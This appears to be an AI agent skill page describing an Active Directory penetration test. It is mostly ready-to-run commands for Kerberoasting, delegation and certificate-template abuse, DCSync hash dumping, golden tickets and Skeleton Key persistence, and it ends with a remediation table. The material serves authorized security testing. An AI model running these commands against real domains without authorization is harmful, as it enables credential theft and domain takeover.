Anthropic-Cybersecurity-Skills performing-active-directory-penetration-test
Conduct a focused Active Directory penetration test to enumerate domain objects, discover attack paths with BloodHound,
install
source · Clone the upstream repo
git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/performing-active-directory-penetration-test" ~/.claude/skills/mukul975-anthropic-cybersecurity-skills-performing-active-directory-penetration- && rm -rf "$T"
manifest:
skills/performing-active-directory-penetration-test/SKILL.mdsource content
Performing Active Directory Penetration Test
Overview
Active Directory (AD) penetration testing targets the central identity and access management system used by over 95% of Fortune 500 companies. The test identifies misconfigurations, weak credentials, dangerous delegation settings, vulnerable certificate templates, and attack paths that enable an attacker to escalate from a standard domain user to Domain Admin or Enterprise Admin.
When to Use
- When conducting security assessments that involve performing active directory penetration test
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
Prerequisites
- Standard domain user credentials (minimum starting point)
- Network access to domain controllers (LDAP/389, Kerberos/88, SMB/445, DNS/53)
- Tools: BloodHound, Impacket, Certipy, Rubeus, NetExec, Mimikatz
- Kali Linux or Windows attack machine with domain access
Phase 1 — AD Enumeration
Domain Information Gathering
# Basic domain enumeration netexec smb 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local --groups netexec smb 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local --users # LDAP enumeration — domain controllers ldapsearch -x -H ldap://10.0.0.5 -D "testuser@corp.local" -w "Password123" \ -b "OU=Domain Controllers,DC=corp,DC=local" "(objectClass=computer)" dNSHostName # Enumerate trust relationships netexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --trusts # Enumerate domain password policy netexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --pass-pol # Enumerate Group Policy Objects netexec smb 10.0.0.5 -u 'testuser' -p 'Password123' --gpp-passwords # Find computers with unconstrained delegation ldapsearch -x -H ldap://10.0.0.5 -D "testuser@corp.local" -w "Password123" \ -b "DC=corp,DC=local" "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" \ dNSHostName # Find users with constrained delegation ldapsearch -x -H ldap://10.0.0.5 -D "testuser@corp.local" -w "Password123" \ -b "DC=corp,DC=local" "(&(objectCategory=user)(msds-allowedtodelegateto=*))" \ sAMAccountName msds-allowedtodelegateto # Enumerate LAPS netexec ldap 10.0.0.5 -u 'testuser' -p 'Password123' -d corp.local -M laps
BloodHound Attack Path Analysis
# Collect all BloodHound data bloodhound-python -u 'testuser' -p 'Password123' -d corp.local \ -ns 10.0.0.5 -c all --zip # Alternative: SharpHound from Windows .\SharpHound.exe -c All --zipfilename bloodhound_data.zip # Start BloodHound sudo neo4j start bloodhound --no-sandbox # Key Cypher queries in BloodHound: # - Shortest path to Domain Admin # - Find Kerberoastable users # - Find AS-REP Roastable users # - Find users with DCSync rights # - Find shortest path from owned principals # - Find computers where Domain Users are local admin
Service Account Discovery
# Find service accounts with SPNs (Kerberoastable) impacket-GetUserSPNs 'corp.local/testuser:Password123' -dc-ip 10.0.0.5 # Find accounts without Kerberos pre-authentication impacket-GetNPUsers 'corp.local/' -usersfile domain_users.txt \ -dc-ip 10.0.0.5 -format hashcat # Find managed service accounts ldapsearch -x -H ldap://10.0.0.5 -D "testuser@corp.local" -w "Password123" \ -b "DC=corp,DC=local" "(objectClass=msDS-GroupManagedServiceAccount)" \ sAMAccountName msDS-GroupMSAMembership
Phase 2 — Kerberos Attacks
Kerberoasting
# Extract TGS tickets for service accounts impacket-GetUserSPNs 'corp.local/testuser:Password123' -dc-ip 10.0.0.5 \ -outputfile kerberoast.txt -request # Crack with Hashcat (mode 13100 for Kerberos 5 TGS-REP etype 23) hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule --force # Targeted Kerberoasting with Rubeus (Windows) .\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_tgs.txt
AS-REP Roasting
# Target accounts without pre-authentication impacket-GetNPUsers 'corp.local/' -usersfile users.txt -dc-ip 10.0.0.5 \ -outputfile asrep.txt -format hashcat # Crack AS-REP hashes (mode 18200) hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Kerberos Delegation Attacks
# Unconstrained delegation — extract TGTs from memory # If you compromise a host with unconstrained delegation: .\Rubeus.exe monitor /interval:5 /nowrap # Force authentication from DC using PrinterBug/SpoolSample .\SpoolSample.exe DC01.corp.local YOURHOST.corp.local .\Rubeus.exe ptt /ticket:<base64_ticket> # Constrained delegation — S4U abuse impacket-getST 'corp.local/svc_web:WebPass123' -spn 'CIFS/fileserver.corp.local' \ -dc-ip 10.0.0.5 -impersonate administrator export KRB5CCNAME=administrator.ccache impacket-psexec 'corp.local/administrator@fileserver.corp.local' -k -no-pass # Resource-Based Constrained Delegation (RBCD) impacket-addcomputer 'corp.local/testuser:Password123' -computer-name 'EVIL$' \ -computer-pass 'EvilPass123' -dc-ip 10.0.0.5 python3 rbcd.py -delegate-to 'TARGET$' -delegate-from 'EVIL$' \ -dc-ip 10.0.0.5 'corp.local/testuser:Password123' impacket-getST 'corp.local/EVIL$:EvilPass123' -spn 'CIFS/target.corp.local' \ -impersonate administrator -dc-ip 10.0.0.5
Phase 3 — ADCS (Active Directory Certificate Services) Attacks
# Enumerate ADCS with Certipy certipy find -u 'testuser@corp.local' -p 'Password123' -dc-ip 10.0.0.5 \ -vulnerable -stdout # ESC1 — Vulnerable certificate template (enrollee can specify SAN) certipy req -u 'testuser@corp.local' -p 'Password123' \ -target ca.corp.local -ca CORP-CA \ -template VulnerableWebServer -upn administrator@corp.local # Authenticate with the certificate certipy auth -pfx administrator.pfx -dc-ip 10.0.0.5 # ESC4 — Template ACL misconfiguration # Modify template to enable ESC1 conditions, then exploit as above # ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA certipy req -u 'testuser@corp.local' -p 'Password123' \ -target ca.corp.local -ca CORP-CA \ -template User -upn administrator@corp.local # ESC8 — NTLM relay to HTTP enrollment endpoint certipy relay -target 'http://ca.corp.local/certsrv/certfnsh.asp' \ -template DomainController
Phase 4 — Domain Privilege Escalation
DCSync Attack
# DCSync — extract all domain hashes (requires replication rights) impacket-secretsdump 'corp.local/domainadmin:DAPass@10.0.0.5' -just-dc # DCSync specific user impacket-secretsdump 'corp.local/domainadmin:DAPass@10.0.0.5' \ -just-dc-user krbtgt # With Mimikatz (Windows) mimikatz# lsadump::dcsync /domain:corp.local /user:krbtgt
Golden Ticket
# Create Golden Ticket (requires krbtgt hash and domain SID) impacket-ticketer -nthash <krbtgt_nthash> -domain-sid S-1-5-21-... \ -domain corp.local administrator export KRB5CCNAME=administrator.ccache impacket-psexec 'corp.local/administrator@dc01.corp.local' -k -no-pass # With Mimikatz mimikatz# kerberos::golden /user:administrator /domain:corp.local \ /sid:S-1-5-21-... /krbtgt:<hash> /ptt
Silver Ticket
# Create Silver Ticket for specific service impacket-ticketer -nthash <service_nthash> -domain-sid S-1-5-21-... \ -domain corp.local -spn MSSQL/sqlserver.corp.local administrator export KRB5CCNAME=administrator.ccache impacket-mssqlclient 'corp.local/administrator@sqlserver.corp.local' -k -no-pass
Phase 5 — Persistence Demonstration
# Skeleton Key (inject into LSASS — authorized testing only) mimikatz# privilege::debug mimikatz# misc::skeleton # Now any user can authenticate with "mimikatz" as password # AdminSDHolder persistence # Add controlled user to AdminSDHolder ACL # SDProp process propagates ACL to all protected groups every 60 minutes # SID History injection # Inject Domain Admin SID into low-privilege user's SID history # Document all persistence mechanisms and clean up after testing
Findings and Remediation
| Finding | CVSS | Remediation |
|---|---|---|
| Kerberoastable accounts with weak passwords | 7.5 | Use gMSA, enforce 25+ char passwords for service accounts |
| Unconstrained delegation on servers | 8.1 | Remove unconstrained delegation, use constrained or RBCD |
| Vulnerable ADCS templates (ESC1-ESC8) | 9.8 | Audit templates, remove dangerous permissions, require approval |
| DCSync permissions on non-DA accounts | 9.8 | Audit replication rights, implement tiered admin model |
| LLMNR/NBT-NS enabled | 8.1 | Disable via GPO |
| No LAPS deployed | 7.2 | Deploy Windows LAPS for local admin management |
| Weak domain password policy | 6.5 | Enforce 14+ chars, implement fine-grained password policies |
References
- BloodHound: https://github.com/BloodHoundAD/BloodHound
- Impacket: https://github.com/fortra/impacket
- Certipy: https://github.com/ly4k/Certipy
- HackTricks AD: https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/index.html
- SpecterOps AD Security: https://specterops.io/blog/
- MITRE ATT&CK: https://attack.mitre.org/